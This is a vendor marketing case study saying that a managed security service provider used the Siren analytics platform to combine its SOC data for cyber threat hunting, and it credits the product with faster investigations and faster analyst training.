Cyber Threat Hunting

Siren for Cyber Threat Hunting

A Managed Security Service Provider Uses Siren for Enterprise Cyber Threat Hunting

Integrated Capabilities to Fully Support Cyber Threat Hunting

Cybersecurity threats represent the single greatest menace to governments and corporates today. It takes little imagination to consider the catastrophic effect of a nation losing its control of critical IT infrastructure, corporates losing control of the key intellectual property, or any organization becoming a victim of sabotage or extortion. The case study highlights how Siren empowered a Managed Services Security Provider (MSSP) to effectively deploy an enterprise-wide cyber threat hunting solution by providing actionable insights.

THE PROBLEM

Hard to Integrate Large Datasets from Multiple Sources & Upskill Analysts

This firm had an extensive amount of data but little integration across all sources in their Security Operations Centre (SOC). It was difficult to integrate open source data coming from multiple sources across all security domains. The MITRE model – widely used to relate how entities in the cyber world interconnect and identify attack patterns, was hard to integrate in practice. The firm was looking to take a proactive stance on threats and not only react when things went wrong.

The traditional methods used by our customer for identifying the threat actors or investigating the cyber threat signals were ad hoc and manual in nature across disconnected datasets. To make sense of their system logs and network monitoring data, security analysts often copied and pasted specific alerts or IPs from one-point solution into another trying to pivot through different dashboards – ended up creating long, complex search queries. This resulted in being difficult, time-consuming, and inefficient.

THE SOLUTION

Siren for Cyber Threat Hunting

This deployment of Siren was implemented in a period of 1 month offering the integration of all relevant datasets into a single pane of glass for the analyst to hunt and analyse threats in real time. Siren’s flexible data model allowed security analysts to rapidly ingest discreet datasets on the fly. The MITRE Att&ck model was leveraged to encode, define, and present the attacks in a manner that is easy to understand, translating complex, hard to understand logs into meaningful cyber event types.

With Siren’s Web Services, analysts were able to enrich their data instantly from open source data. The dashboard was built for each unique index and Siren’s relational navigation enabled analysts to pivot across the dashboards that made exploring logs effortless without using complex query languages. The integrated Knowledge Graph capability allowed analysts to quickly expand, investigate, and drive insights with intuitive link analysis and see the relations between the nodes. No logs. No endless commands. A clear, easy-to-understand network graph.

THE OUTCOME

Single View in the SOC & Rapid Time to Value

Siren provided a single pane of glass in the SOC for investigations that enabled analysts to search all the data from one place. The deployment resulted in a 2X faster time to resolution. Seamless integration of islands of data from multiple cyber datasets that were not used in previous investigations. Increased efficiencies with 3X improvement in time to train new analysts, a huge benefit as their long term challenge has been how to train people up on the complexities of threat investigations, quickly. The intuitive user interface provided rapid time to value and actionable insights.

Ready to kick-start your project?

Our experts can show you exactly how to leverage your data to uncover powerful insights!